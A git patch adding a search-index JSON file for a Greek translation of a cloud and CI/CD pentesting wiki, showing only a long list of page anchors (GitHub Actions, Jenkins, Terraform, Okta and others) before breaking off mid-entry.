From 76dd3e3c6a8bd0cbb714ea8f715d5f06c43383ea Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 12 Feb 2025 14:39:44 +0000 Subject: [PATCH] Update searchindex for el --- searchindex.json | 1 + 1 file changed, 1 insertion(+) create mode 100644 searchindex.json diff --git a/searchindex.json b/searchindex.json new file mode 100644 index 000000000..72a60f085 --- /dev/null +++ b/searchindex.json @@ -0,0 +1 @@ +{"doc_urls":["index.html#hacktricks-cloud","index.html#Εκτέλεση-του-hacktricks-cloud-Τοπικά","index.html#Μεθοδολογία-pentesting-cicd","index.html#Μεθοδολογία-pentesting-cloud","index.html#Άδεια--Αποποίηση-Ευθύνης","index.html#Στατιστικά-github","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pentesting-cicd-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#cicd-pipelines","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs-pentesting-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pipelines-pentesting-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#ppe---poisoned-pipeline-execution","pentesting-ci-cd/pentesting-ci-cd-methodology.html#exploitation-benefits","pentesting-ci-cd/pentesting-ci-cd-methodology.html#more-relevant-info","pentesting-ci-cd/pentesting-ci-cd-methodology.html#tools--cis-benchmark","pentesting-ci-cd/pentesting-ci-cd-methodology.html#top-10-cicd-security-risk","pentesting-ci-cd/pentesting-ci-cd-methodology.html#labs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#automatic-tools","pentesting-ci-cd/pentesting-ci-cd-methodology.html#references","pentesting-ci-cd/github-security/index.html#github-security","pentesting-ci-cd/github-security/index.html#Τι-είναι-το-github","pentesting-ci-cd/github-security/index.html#Βασικές-Πληροφορίες","pentesting-ci-cd/github-security/index.html#Εξωτερική-Αναγνώριση","pentesting-ci-cd/github-security/index.html#github-dorks","pentesting-ci-cd/github-security/index.html#github-leaks","pentesting-ci-cd/github-security/index.html#Εξωτερικά-forks","pentesting-ci-cd/github-security/index.html#github-leaks-σε-διαγραμμέναεσωτερικά-forks","pentesting-ci-cd/github-security/index.html#Σκληροποίηση-Οργάνωσης","pentesting-ci-cd/github-security/index.html#Προ-privileges-Μελών","pentesting-ci-cd/github-security/index.html#Ρυθμίσεις-Δράσεων","pentesting-ci-cd/github-security/index.html#Ενσωματώσεις","pentesting-ci-cd/github-security/index.html#Αναγνώριση--Επιθέσεις-εκμεταλλευόμενοι-διαπιστευτήρια","pentesting-ci-cd/github-security/index.html#Με-Διαπιστευτήρια-Χρήστη","pentesting-ci-cd/github-security/index.html#Με-Κλειδί-ssh-Χρήστη","pentesting-ci-cd/github-security/index.html#Με-token-Χρήστη","pentesting-ci-cd/github-security/index.html#Με-Εφαρμογή-oauth","pentesting-ci-cd/github-security/index.html#Με-Εφαρμογή-github","pentesting-ci-cd/github-security/index.html#Συμβιβασμός--Κατάχρηση-github-action","pentesting-ci-cd/github-security/index.html#Παράκαμψη-Προστασίας-Κλάδου","pentesting-ci-cd/github-security/index.html#Παράκαμψη-Προστασιών-Περιβαλλόντων","pentesting-ci-cd/github-security/index.html#Επιμονή","pentesting-ci-cd/github-security/index.html#Ψεύτικες-Δεσμεύσεις---Πίσω-πόρτα-μέσω-δεσμεύσεων-αποθετηρίου","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Κατάχρηση-των-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Βασικές-Πληροφορίες","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Σύνοψη-Επιπτώσεων","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_token","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Επιτρεπόμενη-Εκτέλεση","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Εκτέλεση-από-Δημιουργία-Αποθετηρίου","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Εκτέλεση-από-Νέο-Κλάδο","pentesting-ci-cd/github-security/abusing-github-actions/index.html#forked-execution","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request_target","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_run","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_call","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Κατάχρηση-Εκτέλεσης-forked","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Εκτέλεση-μη-αξιόπιστης-checkout","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Εισβολές-Σκηνικών","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_env-Εισβολή-Σκηνικού","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Ευάλωτες-Τρίτες-Ενέργειες-github","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Άλλες-Εξωτερικές-Προσβάσεις","pentesting-ci-cd/github-security/abusing-github-actions/index.html#hijacking-Διαγραφέντος-namespace-repo","pentesting-ci-cd/github-security/abusing-github-actions/index.html#repo-pivoting","pentesting-ci-cd/github-security/abusing-github-actions/index.html#cache-poisoning","pentesting-ci-cd/github-security/abusing-github-actions/index.html#artifact-poisoning","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Μετά-την-Εκμετάλλευση-από-μια-Ενέργεια","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Πρόσβαση-σε-aws-και-gcp-μέσω-oidc","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Πρόσβαση-σε-μυστικά","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Κατάχρηση-Αυτοφιλοξενούμενων-εκτελεστών","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github-docker-images-registry","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Ευαίσθητες-πληροφορίες-στα-logs-του-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Καλύπτοντας-τα-Ίχνη-σας","pentesting-ci-cd/github-security/abusing-github-actions/index.html#Εργαλεία","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.html#gh-actions---Δηλητηρίαση-Αρχειων","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.html#gh-actions---Δηλητηρίαση-cache","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#gh-actions---Εισβολές-Σενάριων-Πλαισίου","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Προσβάσιμα-Διαγραμμένα-Δεδομένα-στο-github","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Πρόσβαση-σε-Διαγραμμένα-Δεδομένα-fork","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Πρόσβαση-σε-Διαγραμμένα-Δεδομένα-repo","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Πρόσβαση-σε-Δεδομένα-Ιδιωτικού-repo","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Πώς-να-ανακαλύψετε-commits-από-διαγραμμένακρυφά-forks","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Άμεση-πρόσβαση-στο-commit","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#brute-forcing-σύντομων-τιμών-sha-1","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#Αναφορές","pentesting-ci-cd/github-security/basic-github-information.html#Βασικές-Πληροφορίες-για-το-github","pentesting-ci-cd/github-security/basic-github-information.html#Βασική-Δομή","pentesting-ci-cd/github-security/basic-github-information.html#Προ-privileges","pentesting-ci-cd/github-security/basic-github-information.html#Ρόλοι-Επιχείρησης","pentesting-ci-cd/github-security/basic-github-information.html#Ρόλοι-Οργάνωσης","pentesting-ci-cd/github-security/basic-github-information.html#Δικαιώματα-Μελών","pentesting-ci-cd/github-security/basic-github-information.html#Ρόλοι-Αποθετηρίου","pentesting-ci-cd/github-security/basic-github-information.html#Ομάδες","pentesting-ci-cd/github-security/basic-github-information.html#Χρήστες","pentesting-ci-cd/github-security/basic-github-information.html#Αυθεντικοποίηση-github","pentesting-ci-cd/github-security/basic-github-information.html#Πρόσβαση-μέσω-Ιστού","pentesting-ci-cd/github-security/basic-github-information.html#Κλειδιά-ssh","pentesting-ci-cd/github-security/basic-github-information.html#Προσωπικά-Διακριτικά-Πρόσβασης","pentesting-ci-cd/github-security/basic-github-information.html#Εφαρμογές-oauth","pentesting-ci-cd/github-security/basic-github-information.html#Εφαρμογές-github","pentesting-ci-cd/github-security/basic-github-information.html#Ενέργειες-github","pentesting-ci-cd/github-security/basic-github-information.html#Ενέργειες-git","pentesting-ci-cd/github-security/basic-github-information.html#Διαμόρφωση","pentesting-ci-cd/github-security/basic-github-information.html#Μυστικά-git","pentesting-ci-cd/github-security/basic-github-information.html#git-environments","pentesting-ci-cd/github-security/basic-github-information.html#git-action-runner","pentesting-ci-cd/github-security/basic-github-information.html#git-action-compromise","pentesting-ci-cd/github-security/basic-github-information.html#branch-protections","pentesting-ci-cd/github-security/basic-github-information.html#references","pentesting-ci-cd/gitea-security/index.html#gitea-security","pentesting-ci-cd/gitea-security/index.html#Τι-είναι-το-gitea","pentesting-ci-cd/gitea-security/index.html#Βασικές-Πληροφορίες","pentesting-ci-cd/gitea-security/index.html#Εργαστήριο","pentesting-ci-cd/gitea-security/index.html#Μη-Αυθεντικοποιημένη-Αρίθμηση","pentesting-ci-cd/gitea-security/index.html#Εσωτερική-Εκμετάλλευση","pentesting-ci-cd/gitea-security/index.html#Με-Διαπιστευτήρια-ΧρήστηΙστό-cookie","pentesting-ci-cd/gitea-security/index.html#Με-Κλειδί-ssh-Χρήστη","pentesting-ci-cd/gitea-security/index.html#Με-token-Χρήστη","pentesting-ci-cd/gitea-security/index.html#Με-Εφαρμογή-oauth","pentesting-ci-cd/gitea-security/index.html#Παράκαμψη-Προστασίας-Κλάδου","pentesting-ci-cd/gitea-security/index.html#Καταμέτρηση-webhooks","pentesting-ci-cd/gitea-security/index.html#Μετά-την-Εκμετάλλευση","pentesting-ci-cd/gitea-security/index.html#Μέσα-στον-διακομιστή","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Βασικές-Πληροφορίες-gitea","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Βασική-Δομή","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Άδειες","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Οργανώσεις","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Ομάδες--Χρήστες","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Αυθεντικοποίηση-gitea","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Πρόσβαση-μέσω-Ιστού","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Κλειδιά-ssh","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Προσωπικά-Διακριτικά-Πρόσβασης","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Εφαρμογές-oauth","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Κλειδιά-Ανάπτυξης","pentesting-ci-cd/gitea-security/basic-gitea-information.html#Προστασίες-Κλάδου","pentesting-ci-cd/concourse-security/index.html#concourse-security","pentesting-ci-cd/concourse-security/index.html#basic-information","pentesting-ci-cd/concourse-security/index.html#concourse-architecture","pentesting-ci-cd/concourse-security/index.html#concourse-lab","pentesting-ci-cd/concourse-security/index.html#enumerate--attack-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#Αρχιτεκτονική-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#Αρχιτεκτονική-concourse-1","pentesting-ci-cd/concourse-security/concourse-architecture.html#Αρχιτεκτονική","pentesting-ci-cd/concourse-security/concourse-architecture.html#Αναφορές","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Δημιουργία-Εργαστηρίου-concourse","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Περιβάλλον-Δοκιμών","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Εκτέλεση-concourse","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Δημιουργία-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Βήματα","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#Απλό-Παράδειγμα-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#bash-script-με-ροή-εξόδουεισόδου","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#triggers","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks-1","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#user-roles--permissions","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#vars--credential-manager","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#Αρίθμηση-concourse","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-attacks","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#Αναφορές","pentesting-ci-cd/circleci-security.html#circleci-security","pentesting-ci-cd/circleci-security.html#basic-information","pentesting-ci-cd/circleci-security.html#permissions","pentesting-ci-cd/circleci-security.html#env-variables--secrets","pentesting-ci-cd/circleci-security.html#attacks","pentesting-ci-cd/travisci-security/index.html#travisci-security","pentesting-ci-cd/travisci-security/index.html#Τι-είναι-το-travisci","pentesting-ci-cd/travisci-security/index.html#Επιθέσεις","pentesting-ci-cd/travisci-security/index.html#Ενεργοποιήσεις","pentesting-ci-cd/travisci-security/index.html#pr-Τρίτων","pentesting-ci-cd/travisci-security/index.html#Εκχύλιση-Μυστικών","pentesting-ci-cd/travisci-security/index.html#todo","pentesting-ci-cd/travisci-security/index.html#travisci-enterprise","pentesting-ci-cd/travisci-security/index.html#Αναφορές","pentesting-ci-cd/travisci-security/basic-travisci-information.html#basic-travisci-information","pentesting-ci-cd/travisci-security/basic-travisci-information.html#access","pentesting-ci-cd/travisci-security/basic-travisci-information.html#encrypted-secrets","pentesting-ci-cd/travisci-security/basic-travisci-information.html#environment-variables","pentesting-ci-cd/travisci-security/basic-travisci-information.html#custom-encrypted-secrets","pentesting-ci-cd/travisci-security/basic-travisci-information.html#Προσαρμοσμένα-Κρυπτογραφημένα-Αρχεία","pentesting-ci-cd/travisci-security/basic-travisci-information.html#travisci-enterprise","pentesting-ci-cd/jenkins-security/index.html#jenkins-security","pentesting-ci-cd/jenkins-security/index.html#basic-information","pentesting-ci-cd/jenkins-security/index.html#unauthenticated-enumeration","pentesting-ci-cd/jenkins-security/index.html#Γνωστές-Ευπάθειες","pentesting-ci-cd/jenkins-security/index.html#Σύνδεση","pentesting-ci-cd/jenkins-security/index.html#Εγγραφή","pentesting-ci-cd/jenkins-security/index.html#Σύνδεση-sso","pentesting-ci-cd/jenkins-security/index.html#bruteforce","pentesting-ci-cd/jenkins-security/index.html#password-spraying","pentesting-ci-cd/jenkins-security/index.html#ip-whitelisting-bypass","pentesting-ci-cd/jenkins-security/index.html#internal-jenkins-abuses","pentesting-ci-cd/jenkins-security/index.html#listing-users","pentesting-ci-cd/jenkins-security/index.html#dumping-builds-to-find-cleartext-secrets","pentesting-ci-cd/jenkins-security/index.html#Κλοπή-Διαπιστευτηρίων-ssh","pentesting-ci-cd/jenkins-security/index.html#rce-στο-jenkins","pentesting-ci-cd/jenkins-security/index.html#rce-ΔημιουργίαΤροποποίηση-έργου","pentesting-ci-cd/jenkins-security/index.html#rce-Εκτέλεση-σεναρίου-groovy","pentesting-ci-cd/jenkins-security/index.html#rce-ΔημιουργίαΤροποποίηση-pipeline","pentesting-ci-cd/jenkins-security/index.html#Εκμετάλλευση-pipeline","pentesting-ci-cd/jenkins-security/index.html#Δημιουργία-pipelines","pentesting-ci-cd/jenkins-security/index.html#rce-pipeline","pentesting-ci-cd/jenkins-security/index.html#Έλεγχος-Μεταβλητών-Περιβάλλοντος","pentesting-ci-cd/jenkins-security/index.html#dumping-secrets","pentesting-ci-cd/jenkins-security/index.html#triggers","pentesting-ci-cd/jenkins-security/index.html#Κόμβοι--Πράκτορες","pentesting-ci-cd/jenkins-security/index.html#Πλήρης-παράδειγμα","pentesting-ci-cd/jenkins-security/index.html#Αυθαίρετη-Ανάγνωση-Αρχείου-σε-rce","pentesting-ci-cd/jenkins-security/index.html#rce","pentesting-ci-cd/jenkins-security/index.html#Μετά-την-Εκμετάλλευση","pentesting-ci-cd/jenkins-security/index.html#metasploit","pentesting-ci-cd/jenkins-security/index.html#jenkins-secrets","pentesting-ci-cd/jenkins-security/index.html#Δημιουργία-νέου-διαχειριστή","pentesting-ci-cd/jenkins-security/index.html#Αναφορές","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Βασικές-Πληροφορίες-για-το-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Πρόσβαση","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Όνομα-Χρήστη--Κωδικός","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#cookie","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssoΠρόσθετα","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#tokens","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssh-Κλειδιά","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Εξουσιοδότηση","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Βασίλειο-Ασφαλείας","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#jenkins-Κόμβοι-Πράκτορες--Εκτελεστές","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Μυστικά-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Κρυπτογράφηση-Μυστικών-και-Διαπιστευτηρίων","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Πρόσβαση-σε-Διαπιστευτήρια","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#Αναφορές","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-με-groovy-script","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-με-groovy-script-1","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#Αντίστροφη-θήκη-σε-linux","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#reverse-shell-in-windows","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#script","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#jenkins-rce-ΔημιουργίαΤροποποίηση-Έργου","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#Δημιουργία-Έργου","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#Τροποποίηση-Έργου","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#Εκτέλεση","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#jenkins-rce-ΔημιουργίαΤροποποίηση-pipeline","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#Δημιουργία-νέου-pipeline","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#Τροποποίηση-μιας-Ροής-Εργασίας","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#jenkins-arbitrary-file-read-to-rce-via-remember-me","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#Προαπαιτούμενα-Επίθεσης","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#Λεπτομερής-Διαδικασία-Εκμετάλλευσης","pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.html#jenkins-dumping-secrets-from-groovy","pentesting-ci-cd/apache-airflow-security/index.html#apache-airflow-security","pentesting-ci-cd/apache-airflow-security/index.html#basic-information","pentesting-ci-cd/apache-airflow-security/index.html#local-lab","pentesting-ci-cd/apache-airflow-security/index.html#Ρύθμιση-airflow","pentesting-ci-cd/apache-airflow-security/index.html#rbac-airflow","pentesting-ci-cd/apache-airflow-security/index.html#Επιθέσεις","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#airflow-configuration","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#configuration-file","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#api","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#atlas","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#celery","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#core","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#dask","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#kerberos","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#logging","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#secrets","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#smtp","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#webserver","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#web-authentication","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#airflow-rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#Προεπιλεγμένες-Άδειες","pentesting-ci-cd/terraform-security.html#terraform-security","pentesting-ci-cd/terraform-security.html#basic-information","pentesting-ci-cd/terraform-security.html#terraform-lab","pentesting-ci-cd/terraform-security.html#rce-στο-terraform-δηλητηρίαση-αρχείου-διαμόρφωσης","pentesting-ci-cd/terraform-security.html#terraform-plan","pentesting-ci-cd/terraform-security.html#terraform-apply","pentesting-ci-cd/terraform-security.html#secrets-dumps","pentesting-ci-cd/terraform-security.html#Κατάχρηση-Αρχείων-Κατάστασης-terraform","pentesting-ci-cd/terraform-security.html#rce-στο-terraform-δηλητηρίαση-αρχείου-ρυθμίσεων","pentesting-ci-cd/terraform-security.html#Διαγραφή-πόρων","pentesting-ci-cd/terraform-security.html#Αντικαταστήστε-τον-μαυρισμένο-πάροχο","pentesting-ci-cd/terraform-security.html#Αυτόματοι-Εργαλειοθήκες-Ελέγχου","pentesting-ci-cd/terraform-security.html#snyk-infrastructure-as-code-iac","pentesting-ci-cd/terraform-security.html#checkov","pentesting-ci-cd/terraform-security.html#terraform-compliance","pentesting-ci-cd/terraform-security.html#tfsec","pentesting-ci-cd/terraform-security.html#kicks","pentesting-ci-cd/terraform-security.html#terrascan","pentesting-ci-cd/terraform-security.html#Αναφορές","pentesting-ci-cd/atlantis-security.html#atlantis-security","pentesting-ci-cd/atlantis-security.html#basic-information","pentesting-ci-cd/atlantis-security.html#local-lab","pentesting-ci-cd/atlantis-security.html#atlantis-access","pentesting-ci-cd/atlantis-security.html#server-configuration","pentesting-ci-cd/atlantis-security.html#atlantis-commands","pentesting-ci-cd/atlantis-security.html#Επιθέσεις","pentesting-ci-cd/atlantis-security.html#post-exploitation","pentesting-ci-cd/atlantis-security.html#mitigations","pentesting-ci-cd/atlantis-security.html#references","pentesting-ci-cd/cloudflare-security/index.html#cloudflare-security","pentesting-ci-cd/cloudflare-security/index.html#websites","pentesting-ci-cd/cloudflare-security/index.html#domain-registration","pentesting-ci-cd/cloudflare-security/index.html#analytics","pentesting-ci-cd/cloudflare-security/index.html#pages","pentesting-ci-cd/cloudflare-security/index.html#workers","pentesting-ci-cd/cloudflare-security/index.html#r2","pentesting-ci-cd/cloudflare-security/index.html#stream","pentesting-ci-cd/cloudflare-security/index.html#images","pentesting-ci-cd/cloudflare-security/index.html#security-center","pentesting-ci-cd/cloudflare-security/index.html#turnstile","pentesting-ci-cd/cloudflare-security/index.html#zero-trust","pentesting-ci-cd/cloudflare-security/index.html#bulk-redirects","pentesting-ci-cd/cloudflare-security/index.html#notifications","pentesting-ci-cd/cloudflare-security/index.html#manage-account","pentesting-ci-cd/cloudflare-security/index.html#ddos-investigation","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#cloudflare-domains","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#overview","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#analytics","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#dns","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#email","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#spectrum","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#ssltls","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#security","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#access","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#speed","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#caching","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#workers-routes","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#rules","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#network","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#traffic","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#custom-pages","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#apps","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#scrape-shield","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#zaraz","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#web3","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#cloudflare-zero-trust-network","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#analytics","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#gateway","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#access","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#my-team","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#logs","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#settings","pentesting-ci-cd/okta-security/index.html#okta-security","pentesting-ci-cd/okta-security/index.html#basic-information","pentesting-ci-cd/okta-security/index.html#summary","pentesting-ci-cd/okta-security/index.html#attacks","pentesting-ci-cd/okta-security/index.html#locating-okta-portal","pentesting-ci-cd/okta-security/index.html#login-in-okta-via-kerberos","pentesting-ci-cd/okta-security/index.html#hijacking-okta-ad-agent","pentesting-ci-cd/okta-security/index.html#hijacking-ad-as-an-admin","pentesting-ci-cd/okta-security/index.html#okta-fake-saml-provider","pentesting-ci-cd/okta-security/index.html#phishing-okta-portal-with-evilgnix","pentesting-ci-cd/okta-security/index.html#colleague-impersonation-attack","pentesting-ci-cd/okta-security/index.html#evading-behavioural-detection-policies","pentesting-ci-cd/okta-security/index.html#okta-hardening","pentesting-ci-cd/okta-security/index.html#references","pentesting-ci-cd/okta-security/okta-hardening.html#okta-hardening","pentesting-ci-cd/okta-security/okta-hardening.html#directory","pentesting-ci-cd/okta-security/okta-hardening.html#people","pentesting-ci-cd/okta-security/okta-hardening.html#groups","pentesting-ci-cd/okta-security/okta-hardening.html#devices","pentesting-ci-cd/okta-security/okta-hardening.html#profile-editor","pentesting-ci-cd/okta-security/okta-hardening.html#directory-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#profile-sources","pentesting-ci-cd/okta-security/okta-hardening.html#customizations","pentesting-ci-cd/okta-security/okta-hardening.html#brands","pentesting-ci-cd/okta-security/okta-hardening.html#sms","pentesting-ci-cd/okta-security/okta-hardening.html#end-user-dashboard","pentesting-ci-cd/okta-security/okta-hardening.html#other","pentesting-ci-cd/okta-security/okta-hardening.html#applications","pentesting-ci-cd/okta-security/okta-hardening.html#applications-1","pentesting-ci-cd/okta-security/okta-hardening.html#identity-governance","pentesting-ci-cd/okta-security/okta-hardening.html#access-certifications","pentesting-ci-cd/okta-security/okta-hardening.html#security","pentesting-ci-cd/okta-security/okta-hardening.html#general","pentesting-ci-cd/okta-security/okta-hardening.html#healthinsight","pentesting-ci-cd/okta-security/okta-hardening.html#authenticators","pentesting-ci-cd/okta-security/okta-hardening.html#authentication-policies","pentesting-ci-cd/okta-security/okta-hardening.html#global-session-policy","pentesting-ci-cd/okta-security/okta-hardening.html#identity-providers","pentesting-ci-cd/okta-security/okta-hardening.html#delegated-authentication","pentesting-ci-cd/okta-security/okta-hardening.html#network","pentesting-ci-cd/okta-security/okta-hardening.html#device-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#api","pentesting-ci-cd/okta-security/okta-hardening.html#workflow","pentesting-ci-cd/okta-security/okta-hardening.html#automations","pentesting-ci-cd/okta-security/okta-hardening.html#reports","pentesting-ci-cd/okta-security/okta-hardening.html#reports-1","pentesting-ci-cd/okta-security/okta-hardening.html#system-log","pentesting-ci-cd/okta-security/okta-hardening.html#import-monitoring","pentesting-ci-cd/okta-security/okta-hardening.html#rate-limits","pentesting-ci-cd/okta-security/okta-hardening.html#settings","pentesting-ci-cd/okta-security/okta-hardening.html#account","pentesting-ci-cd/okta-security/okta-hardening.html#downloads","pentesting-ci-cd/serverless.com-security.html#serverlesscom-security","pentesting-ci-cd/serverless.com-security.html#basic-information","pentesting-ci-cd/serverless.com-security.html#organization","pentesting-ci-cd/serverless.com-security.html#team","pentesting-ci-cd/serverless.com-security.html#application","pentesting-ci-cd/serverless.com-security.html#services","pentesting-ci-cd/serverless.com-security.html#tutorial","pentesting-ci-cd/serverless.com-security.html#Αξιολόγηση-Ασφαλείας-του-serverlesscom","pentesting-ci-cd/serverless.com-security.html#Κακώς-ρυθμισμένοι-ρόλοι-και-άδειες-iam","pentesting-ci-cd/serverless.com-security.html#Ασφαλή-Μυστικά-και-Διαχείριση-Ρυθμίσεων","pentesting-ci-cd/serverless.com-security.html#Ευάλωτος-Κώδικας-και-Εξαρτήσεις","pentesting-ci-cd/serverless.com-security.html#Ανεπαρ